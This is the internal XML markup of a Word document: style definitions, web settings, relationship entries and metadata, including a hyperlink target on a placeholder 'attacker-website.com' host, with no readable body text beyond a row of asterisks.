    <w:p w14:paraId="4E22AD13" w14:textId="37A7E29A" w:rsidR="00A30118" w:rsidRPr="00A30118" w:rsidRDefault="00A30118" w:rsidP="00BC0B79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A30118">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>********</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A30118" w:rsidRPr="00A30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B1B07"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FDF410F8"/>
    <w:lvl w:ilvl="0" w:tplc="C0FE855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6026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1C8"/>
    <w:rsid w:val="0003015C"/>
    <w:rsid w:val="0005478F"/>
    <w:rsid w:val="0011494B"/>
    <w:rsid w:val="0038453D"/>
    <w:rsid w:val="003B5198"/>
    <w:rsid w:val="00474E93"/>
    <w:rsid w:val="00480CB5"/>
    <w:rsid w:val="00531A6F"/>
    <w:rsid w:val="00533091"/>
    <w:rsid w:val="005C5183"/>
    <w:rsid w:val="006D18E3"/>
    <w:rsid w:val="00750D8C"/>
    <w:rsid w:val="00773A67"/>
    <w:rsid w:val="00792F0C"/>
    <w:rsid w:val="007C0EDE"/>
    <w:rsid w:val="00853F12"/>
    <w:rsid w:val="008778C8"/>
    <w:rsid w:val="009C21C8"/>
    <w:rsid w:val="00A30118"/>
    <w:rsid w:val="00BA7D16"/>
    <w:rsid w:val="00BC0B79"/>
    <w:rsid w:val="00C45F8D"/>
    <w:rsid w:val="00C762D7"/>
    <w:rsid w:val="00D05403"/>
    <w:rsid w:val="00E84DDC"/>
    <w:rsid w:val="00EF3FA6"/>
    <w:rsid w:val="00F45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0E2172"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D17A4F29-7742-4550-AE01-24E26B141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1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21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21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21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21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21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21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21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21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1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21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21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21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21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21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21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21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21C8"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="009C21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21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21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21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21C8"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="009C21C8"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="009C21C8"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="009C21C8"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="009C21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21C8"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="009C21C8"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007C0EDE"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007C0E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3554">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="47648283">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="192234439">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="193275679">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="195047510">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="210577006">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="435297224">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="489952583">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="505218093">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="510681251">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="528763209">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="584071825">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="604654422">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="679694619">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="720597912">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="749735526">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="772365350">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="969943581">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1068918212">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1079211904">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1094520057">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1281497710">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1541934954">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1574703937">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1660035831">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1665353157">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1698000404">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1716394468">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1976333065">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2029139321">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2081635803">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2098943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ttacker-website.com/home/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://normal-website.com/h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7</Pages>
  <Words>1471</Words>
  <Characters>8547</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>213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thatanon556@proton.me</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>thatanon556@proton.me</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-08-29T01:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-01T18:07:00Z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7fbacd65b7e0c98566f05938f568c1733df4fb798f6637069039bca77092cac4</vt:lpwstr>
  </property>
</Properties>
</file>